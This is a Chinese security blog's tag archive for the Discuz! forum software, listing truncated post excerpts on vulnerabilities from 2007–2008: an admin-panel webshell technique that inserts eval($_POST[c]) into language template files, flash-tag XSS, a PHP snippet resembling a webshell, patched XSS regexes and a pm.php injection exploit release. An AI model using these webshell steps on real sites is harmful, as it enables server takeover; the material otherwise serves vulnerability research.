标签 ‘Discuz!’ 下的日志

discuz安全提问算法

2008/03/09 9:08 | 鬼仔 | 技术文章 | 消灭0回复

作者:amxku
来源:amxku’s blog

今天朋友问我discuz安全提问答案能不能饶过去。或者破解,我以前就注意过个密码,只记得很短,以为是substr取的MD5,最后看了半天的源码,确实是MD5加密的,不过,加密的过程有点晕
阅读全文 »

Tags: ,

Discuz! 6 后台拿Shell的方法

2008/02/04 11:00 | 鬼仔 | 技术文章 | 1 个回复

文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
阅读全文 »

Tags: ,

Discuz!/phpwind flash标签的xss

2007/12/10 12:24 | 鬼仔 | 技术文章 | 1 个回复

author: superhei
date: 2007-12-2
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com

flash标签的xss在以前的是很流行的,以前只要随便一个调用外面的一个swf就ok了,现在的则都不可以直接使用调用外码的swf了,这个是因为一般都设置了allowScriptAccess[1][2].比如dz的codz:

dz60904\upload\forumdata\cache\cache_bbcodes.php [同样出现在cache_viewthread.php cache_post.php cache_blog.php里]
阅读全文 »

Tags: , , ,

Discuz! 6.0.0 0Day漏洞

2007/11/23 2:31 | 鬼仔 | 技术文章 | 2 个回复

loveshell:哎 下次仔细看下代码再发!Just a joke…
鬼仔注:未测试。

来源:坏狼安全网

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
阅读全文 »

Tags: , , , ,

dz升级检测功能的黑盒测试

2007/09/08 8:32 | 鬼仔 | 技术文章 | 消灭0回复

BY [email protected]

‘dz的论坛程序升级通知’是个不错的功能,很多注意安全的程序都有类似的功能比如:wordpress
我们先看看dz功能的实现代码 :

\admin\global.func.php
阅读全文 »

Tags:

Dz0724补丁补掉的一个xss+补掉的另外一个xss

2007/09/03 9:27 | 鬼仔 | 技术文章 | 消灭0回复

BY [email protected] 07/09/03

对比补丁我们发现在\include\discuzcode.func.php里:

$discuzcodes['searcharray']['bbcode_regexp'] = array( //标签的正则

"/\[align=([^\[\<]+?)\]/i",         ---->补丁前
"/\[float=([^\[\<]+?)\]/i"
|
V
"/\[align=(left|center|right)\]/i", ---->补丁后
[/align] "/\[float=(left|right)\]/i"
[/code]

阅读全文 »

Tags: ,

DZ5.0 pm.php注入漏洞+利用程序

2007/03/13 1:51 | 鬼仔 | 工具收集 | 3 个回复

以前拿到一个,跟这个不一样,这个是黑鹰发出来的一个版本。

来源:黑鹰

大家好.我是jackal

2007给大家带点礼物.关于dz5.0的0day.

网上很多人发现了.只是没公布.

我不是第一个发现的.

但是自己读了代码找到了利用的地方.

******************************************************************************
本动画的MD5值为:
93b367244c68d61168a9cd6450b6362e DZ0day.exe
******************************************************************************

阅读全文 »

Tags: , , ,

Discuz! 5 精简版发布

2007/01/20 9:38 | 鬼仔 | 工具收集 | 3 个回复

作者:angel
来源:SaBlog交流论坛

Sa系列程序开发员4ngel根据论坛需求而修改的程序,以Discuz! 5为核心,根据本站需求对其进行了必要的裁减、修改和完善。为了让您在本论坛能够有更舒适的环境,欢迎更多的朋友为此程序出谋划策。

只保留了以下的33个数据表。

cdb_admingroups
cdb_adminsessions
cdb_announcements
cdb_attachments
cdb_attachtypes
cdb_banned
cdb_bbcodes
cdb_failedlogins
cdb_forumfields
cdb_forumlinks
cdb_forums
cdb_memberfields
cdb_members

阅读全文 »

Tags: